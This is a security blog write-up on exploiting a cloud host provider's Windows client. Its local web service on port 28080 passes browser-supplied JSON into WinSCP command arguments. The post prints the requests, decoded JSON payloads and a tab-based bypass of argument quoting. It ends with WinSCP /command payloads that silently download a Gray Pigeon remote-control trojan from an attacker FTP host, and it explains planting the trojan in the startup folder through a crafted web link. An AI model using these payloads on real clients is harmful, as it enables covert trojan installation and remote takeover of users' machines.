A cloud pc client command execution process

Category: Tag:

1 Introduction

Recently, I tested a cloud server provider and studied the cloud client for a day to find a command to execute, so I wrote it down and shared my experience. This is not about binary overflow, but exploited through web-related vulnerabilities. You may be curious, let the client execute commands through web-type vulnerabilities? ? ?

(2) Client analysis

Visit the cloud host management address and download a client with more than 50 MB.

After installation, the client directory is as follows

 

Select a host in the web version of the host management system and click File Transfer

 

Then select a host account

The error window of winscp pops up

 

Because the ip address of my test host was written casually, it prompted a network exception here. Then look at the data packet sent at this time

 

You can see that it is to communicate with the client by sending http data packets to the local address 127.0.0.1:28080 through the browser.

We use anti-rootkit tools to view local network ports

 

 

See that the client rest-server monitors the fixed port 28080, and calls WinSCP when the file transfer command is sent. WinSCP is an open source graphical SFTP client that uses SSH in the Windows environment. It also supports SCP protocol. Its main function is to safely copy files between local and remote computers.

3) Java execution commands and command injection

Note that there is an error.log file in the client installation directory, open it and take a look

 

Through the log information, we can conclude that the local web service listening on port 28080 was developed by Jetty, the last line

WinSCP.exe 13078066054@127.0.0.1@89#340:MD5#7dd75c55c0f3a84969cacc5fcdbbd980@123.59.53.20:22222

After we click on the file transfer, the browser sends instructions to the local client, and then the client executes the function

The following string is the configuration string for the host. Note the exec: string in the log, then the client executes java through jetty and then calls winscp.

Note the instruction packet:

GET /connector/json?data=eyd0eXBlJzonc2NwJywndXNlcm5hbWUnOicxMzA3ODA2NjA1NEAxMjcuM**wLjFAODkjMzQwJywncGFzc3dvcmQnOidNRDUjN2RkNzVjNTVjMGYzYTg0OTY5Y2FjYzVmY2RiYmQ5ODAnLCdzZXJ2ZXInOicxMjMuNTkuNTMuMjAnLCdwb3J0JzonMjIyMjInLCd3aWR0aCc6JzEzNjYnLCdoZWlnaHQnOic3NjgnfQ==&jsoncallback=jQuery111205498347991109811_1464068504557&_=1464068504558 HTTP/1.1
Host: 127.0.0.1:28080
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
DNT: 1
Referer: http://123.59.53.20/server
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

The parameter data is base64 encoding and decoding:

{‘type’:’scp’,’username’:’13078066054@127.0.0.1@89#340′,

‘password’:’MD5#7dd75c55c0f3a84969cacc5fcdbbd980′,

‘server’:’123.59.53.20′,’port’:’22222′,

‘width’:’1366′,’height’:’768′}
Then the execution in error.log
13078066054@127.0.0.1@89#340:MD5#7dd75c55c0f3a84969cacc5fcdbbd980@123.59.53.20:22222
It is passed through this json data.
We replace it as follows
{‘type’:’scp’,

‘username’:'”|xxoo13078066054@127.0.0.1@89#340′,

‘password’:’MD5#7dd75c55c0f3a84969cacc5fcdbbd980′,

‘server’:’123.59.53.20′,

‘port’:’22222′,

‘width’:’1366′,’height’:’768′}

Send it again after Base64 encoding. Check error.log and see that the changed parameters are successfully passed in. It is visible that dirty data can be introduced in the username. Then we try command injection, execute ipconfig and redirect the execution result to c:\ff

{'type':'scp','username':'ipconfig>c:\\ff&&xxoo13078066054@127.0.0.1@89#340','password':'MD5#7dd75c55c0f3a84969cacc5fcdbbd980','server':'123.59.53.20','port':'22222','width':'1366','height':'768'}

See error.log

The syntax from the command line has been executed perfectly. But the C drive does not have an ff file.
Java execution commands generally use runtime, the code is as follows

 

We try to execute ipconfig&&ping -n 1 localhost

Successfully reported an error

 

 

So java executes commands in this way and cannot inject commands anyway, because the function handles special characters.

 

(4) Bypass the double quotes for parameter injection

Commands cannot be injected directly. I turned my attention to winscp, can we control some parameters to achieve our goals? Try to introduce the parameter switch /a -b, we all know that parameters are generally passed like this.

Submit the following data

{'type':'scp','username':'/a -b aanxxoo13078066054@127.0.0.1@89#340','password':'MD5#7dd75c55c0f3a84969cacc5fcdbbd980','server':'123.59.53.20','port':'22222','width':'1366','height':'768'}&jsoncallback=jQuery111205498347991109811_1464068504557

We look at error.log

 

Seeing that after adding these two switches, the parameter of winscp has double quotation marks. Everyone knows that the double quotation marks become a parameter. Now the switches are not working. After repeated fuzzing, it was found that the background program with tabs instead of spaces would not add double quotes.

 

Now that the parameters are controllable, it depends on winscp whether it can cause loopholes.

(5) Advanced use of Winscp

Under normal circumstances, everyone uses the graphical interface of winscp for ssh file transfer. In fact, it has some more advanced functions in the command line. I studied the winscp manual, where the https://winscp.net/eng/docs/guide_automation automation module explained that it can execute script, script is some operation commands put in a file. Such as myscript.txt

# Connect to SFTP server using a password
open sftp://user:password@example.com/ -hostkey="ssh-rsa 2048 xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx"
# Upload file
put d:\examplefile.txt /home/user/
# Exit WinSCP
Exit

The script above is to copy the local d:\examplefile.txt file to the /home/user/ directory of the remote server example.com
Just execute winscp.com /script=myscript.txt.
Then you can specify the script content on the command line through the command parameter, and enclose each line in quotation marks.

/command        "option confirm off"         "open root:123456@192.168.217.129" "put c:\\1.txt   /tmp/winscp.txt"     "exit"

My idea here is to use winscp to inject all parameters, copy the remote control trojan (gray pigeon) on our ssh service to the local startup item, click the link I provide, or use the insert image to insert the attack link. The Trojan is written into its PC auto-start item, and the remote control will be implanted in the next boot.

(6) Scp use trial

Try the scp protocol first, because scp is the most native protocol of winscp. Send the following payload

{'type':'scp','username':'/command "open root:123456@192.168.217.129" "put c:\\1.txt" "exit" /log=scp2.log 13078066054@123.59.78.141@23#283','password':'MD5#7dd75c55c0f3a84969cacc5fcdbbd980','server':'123.59.53.20','port':'22222','width':'1920','height':'1080'}

Among them, 192.168.217.129 is the ssh server where I put the remote control Trojan horse, and the space is replaced by tab. We added a log parameter, look at the winscp log file scp2.log in the client installation directory

 

 

Says that hostkey is not verified.

Checked a lot of information and sent the following payload to download the file successfully through the scp protocol

"option confirm off" "open root:123456@192.168.217.129 -hostkey=""ssh-rsa 2048 ea:9f:86:e4:5f:56:c6:97:78:9d:4c:c6:ee:c3:20:bc""" "put c:\\1.txt /tmp/winscp.txt" "exit" /log=scp4.log

At this time, you can copy the files, change a computer during the test, and then use the payload again and find that the hostkey has changed again. Checked the information and said that the hostkey will change due to restarting the system and other reasons

https://support.ssh.com/manuals/server-zos-admin/55/Defining_Server_Host_Key.html

So this method is not reliable. If the Hostkey changes, you have to modify the payload.

(7) Ftp transmission and utilization

Because winscp also supports ftp, everything else, such as sftp, is encrypted by ssl, here is a plaintext protocol.

Then we start a ftp server as the payload server, through the pyftp library that comes with python, when starting ftp, there is a 1.exe in the current directory, which is the controlled end of the gray pigeon.

The remote ftp file can be downloaded locally through the following poc payload.

{‘type’:’scp’,’username’:’/command “open ftp://anonymous:anonymous@xxxx.iok.la” “get 1.exe C:\\huigezi.exe” “exit” /log =scp4.log 13078066054@123.59.78.141@23#283′,’password’:’MD5#7dd75c55c0f3a84969cacc5fcdbbd980′,’server’:’123.59.53.20′,’port’:’22222′,’width’:’1920′ ,’height’:’1080′}
xxxx.iok.las is its own domain name

Structure the html file

 

 

Put it on your own web server

Visit the target and change the address, at this time winscp downloads the file silently in the background

 

We look at the output of the ftp service

 

 

Look at the local winscp log

 

 

The description file is successfully downloaded, and then look at the root directory of the c drive, there is already a gray pigeon remote control。

 

 

In actual use, we download the Trojan horse software to the startup directory or directly overwrite other exe files to achieve the purpose of execution.

 

The summary of this vulnerability is “parameter injection, downloading malicious programs to the specified directory to achieve self-starting”, the principle is similar to the get type csrf.

 

 

Reviews

There are no reviews yet.

Be the first to review “A cloud pc client command execution process”

Your email address will not be published. Required fields are marked *